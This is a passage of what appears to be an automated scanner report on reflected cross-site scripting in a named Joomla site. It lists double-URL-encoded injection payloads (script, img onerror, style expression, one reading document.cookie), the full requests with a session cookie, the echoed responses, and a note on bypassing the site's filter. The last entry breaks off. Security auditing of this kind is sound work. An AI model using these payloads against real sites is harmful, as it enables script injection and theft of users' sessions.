GET /joomla-naujienos4b70f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1469d13651/71-lietuviu-kalba-joomla-16-versijai.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos4b70f"><script>alert(1)</script>a1469d13651/71-lietuviu-kalba-joomla-16-versijai.html" />
...[SNIP]...

4.1222. http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a753%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efe6f52d12d7 was submitted in the REST URL parameter 2. This input was echoed as 2a753"><img src=a onerror=alert(1)>fe6f52d12d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /joomla-naujienos/2a753%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efe6f52d12d7 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/2a753"><img src=a onerror=alert(1)>fe6f52d12d7" />
...[SNIP]...

4.1223. http://www.lithuanianjoomla.com/joomla-sasajos.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-sasajos.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61531%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed3c1aa5c518 was submitted in the REST URL parameter 1. This input was echoed as 61531"><img src=a onerror=alert(1)>d3c1aa5c518 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /61531%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed3c1aa5c518 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13452


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/61531"><img src=a onerror=alert(1)>d3c1aa5c518" />
...[SNIP]...

4.1224. http://www.lithuanianjoomla.com/joomla-saugumas.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-saugumas.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8325f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee5bd78503f0 was submitted in the REST URL parameter 1. This input was echoed as 8325f"><img src=a onerror=alert(1)>e5bd78503f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /8325f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee5bd78503f0 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/8325f"><img src=a onerror=alert(1)>e5bd78503f0" />
...[SNIP]...

4.1225. http://www.lithuanianjoomla.com/joomla-versijos.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-versijos.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb055%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e22ae4dc4162 was submitted in the REST URL parameter 1. This input was echoed as cb055"><img src=a onerror=alert(1)>22ae4dc4162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cb055%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e22ae4dc4162 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:39 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/cb055"><img src=a onerror=alert(1)>22ae4dc4162" />
...[SNIP]...

4.1226. http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /kaip-idiegti-joomla.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feff1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e4eee9e43b2b was submitted in the REST URL parameter 1. This input was echoed as feff1"><img src=a onerror=alert(1)>4eee9e43b2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /feff1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e4eee9e43b2b HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:35 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/feff1"><img src=a onerror=alert(1)>4eee9e43b2b" />
...[SNIP]...

4.1227. http://www.lithuanianjoomla.com/kontaktai.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /kontaktai.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6faf%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec1202c31614 was submitted in the REST URL parameter 1. This input was echoed as a6faf"><img src=a onerror=alert(1)>c1202c31614 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a6faf%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec1202c31614 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/a6faf"><img src=a onerror=alert(1)>c1202c31614" />
...[SNIP]...

4.1228. http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /lithuanianjoomlacom-misija.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f691%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e01c4d9e30e1 was submitted in the REST URL parameter 1. This input was echoed as 8f691"><img src=a onerror=alert(1)>01c4d9e30e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /8f691%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e01c4d9e30e1 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17145


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/8f691"><img src=a onerror=alert(1)>01c4d9e30e1" />
...[SNIP]...

4.1229. http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /lithuanianjoomlacom-vizija.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ded%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eced0bcfe368 was submitted in the REST URL parameter 1. This input was echoed as 29ded"><img src=a onerror=alert(1)>ced0bcfe368 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /29ded%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eced0bcfe368 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/29ded"><img src=a onerror=alert(1)>ced0bcfe368" />
...[SNIP]...

4.1230. http://www.lithuanianjoomla.com/media/system/css/system.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /media/system/css/system.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a109%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e856555f93b0 was submitted in the REST URL parameter 4. This input was echoed as 8a109"><x style=x:expression(alert(1))>856555f93b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /media/system/css/8a109%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e856555f93b0 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:27:01 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17288


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/media/system/css/8a109"><x style=x:expression(alert(1))>856555f93b0" />
...[SNIP]...

4.1231. http://www.lithuanianjoomla.com/media/system/js/core.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /media/system/js/core.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bc82%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224686791049c was submitted in the REST URL parameter 4. This input was echoed as 6bc82"style="x:expression(alert(1))"4686791049c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /media/system/js/6bc82%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224686791049c HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:44 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 16237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/media/system/js/6bc82"style="x:expression(alert(1))"4686791049c" />
...[SNIP]...

4.1232. http://www.lithuanianjoomla.com/media/system/js/mootools-core.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /media/system/js/mootools-core.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7407b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea1b078a95ed was submitted in the REST URL parameter 4. This input was echoed as 7407b"><img src=a onerror=alert(1)>a1b078a95ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /media/system/js/7407b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea1b078a95ed HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:27:47 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/media/system/js/7407b"><img src=a onerror=alert(1)>a1b078a95ed" />
...[SNIP]...

4.1233. http://www.lithuanianjoomla.com/naujienos.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /naujienos.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 251c1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e1dd9a4d1eed was submitted in the REST URL parameter 1. This input was echoed as 251c1"><img src=a onerror=alert(1)>1dd9a4d1eed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /251c1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e1dd9a4d1eed HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:24 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/251c1"><img src=a onerror=alert(1)>1dd9a4d1eed" />
...[SNIP]...

4.1234. http://www.lithuanianjoomla.com/saugi-joomla.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /saugi-joomla.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6d5f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed51118b6c59 was submitted in the REST URL parameter 1. This input was echoed as d6d5f"><img src=a onerror=alert(1)>d51118b6c59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /d6d5f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed51118b6c59 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:44 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/d6d5f"><img src=a onerror=alert(1)>d51118b6c59" />
...[SNIP]...

4.1235. http://www.lithuanianjoomla.com/saugi-joomla.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lithuanianjoomla.com
Path:   /saugi-joomla.html

Issue detail

